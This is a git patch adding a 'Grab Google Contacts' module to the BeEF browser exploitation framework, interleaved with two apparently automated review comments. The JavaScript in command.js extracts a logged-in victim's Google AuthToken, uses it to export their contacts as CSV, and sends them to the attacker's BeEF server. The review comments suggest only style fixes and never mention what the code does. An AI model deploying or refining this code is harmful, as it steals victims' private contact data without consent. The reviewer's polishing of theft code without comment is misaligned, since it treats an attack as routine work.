From 86b5d9f613dba2973680a6e5e635ccaf41902e24 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 21 Sep 2011 12:29:17 +0000
Subject: [PATCH] (Fixes issue 506): added 'grab google contacts' chrome extension exploit.
git-svn-id: https://beef.googlecode.com/svn/trunk@1304 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../grab_google_contacts/command.js | 50 +++++++++++++++++++
 .../grab_google_contacts/config.yaml | 25 ++++++++++
 .../grab_google_contacts/module.rb | 24 +++++++++
 3 files changed, 99 insertions(+)
 create mode 100644 modules/chrome_extensions/grab_google_contacts/command.js
 create mode 100644 modules/chrome_extensions/grab_google_contacts/config.yaml
 create mode 100644 modules/chrome_extensions/grab_google_contacts/module.rb
diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js
new file mode 100644
index 000000000..974806566
--- /dev/null
+++ b/modules/chrome_extensions/grab_google_contacts/command.js
@@ -0,0 +1,50 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var regContacts = '("AuthToken":{"Value":")(.*)("}}};)';
+ function grabCSV(token){
+ var csv = new XMLHttpRequest();
+ csv.open("GET", "https://www.google.com/voice/c/b/X/data/export?groupToExport=%5EMine&exportType=ALL&out=GMAIL_CSV&tok="+token,false);
+ csv.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
+ csv.send();
+ return csv.responseText
+ }
+
+ function toolContact(v) {
+ var re = new RegExp(regContacts);
+ var m = re.exec(v);
+ if (m != null) {
+ tmpCSV = grabCSV(m[2])
+ params = "email=email&csv="+tmpCSV;
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, tmpCSV);
+ }
+ }
+
+ function grabContacts(){
+ var client = new XMLHttpRequest();
+ client.open("GET", "https://www.google.com/voice/c/b/X/ui/ContactManager" ,false);
+ client.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
+ client.send();
+ if(client.status != 200){ // if the victim is not authenticated in Google, a 403 Forbidden error is received.
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'The victim is not logged in Google.');
+ }else{ //proceed
+ toolContact(client.responseText);
+ }
+ }
+
+ grabContacts();
+});
+
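Review bot: In toolContact, `tmpCSV` and `params` are assigned without `var`, so both become implicit globals on the hosting page, and `params` is never read after it is built. Declare the one that is used and drop the dead assignment: `var tmpCSV = grabCSV(m[2]);` in place of the two lines. The `return csv.responseText` in grabCSV lacks a terminating semicolon, and the `m != null` and `client.status != 200` checks would read better as strict `!==` comparisons, consistent with the explicit style used elsewhere in the closure. The inline comment on the status check mentions a 403 specifically while the code branches on any non-200, which is fine but worth stating in the comment so the two do not look contradictory.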
diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml
new file mode 100644
index 000000000..aa19b4deb
--- /dev/null
+++ b/modules/chrome_extensions/grab_google_contacts/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ grab_google_contacts:
+ enable: true
+ category: "Chrome Extensions"
+ name: "Grab Google Contacts"
+ description: "Attempt to grab the contacts of the currently logged in Google account, exploiting the export to CSV feature."
+ authors: ["Kos", "antisnatchor"]
+ target:
+ working: ["C"]
diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb
new file mode 100644
index 000000000..5a9e13a73
--- /dev/null
+++ b/modules/chrome_extensions/grab_google_contacts/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Grab_google_contacts < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['Return'] = @datastore['return']
+ save content
+ end
+
+end
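Review bot: post_execute builds `content` in two statements where a hash literal does the same job in one; `content = { 'Return' => @datastore['return'] }` followed by `save content` reads more directly. The class also carries no comment on what post_execute persists, and a reader coming from command.js has to infer that the `'Return'` key receives whatever text the JS side sent (the CSV body or the not-logged-in message). A one-line comment above the method such as `# Persist the text returned by command.js (CSV export or the not-logged-in message) under 'Return'.` would close that gap.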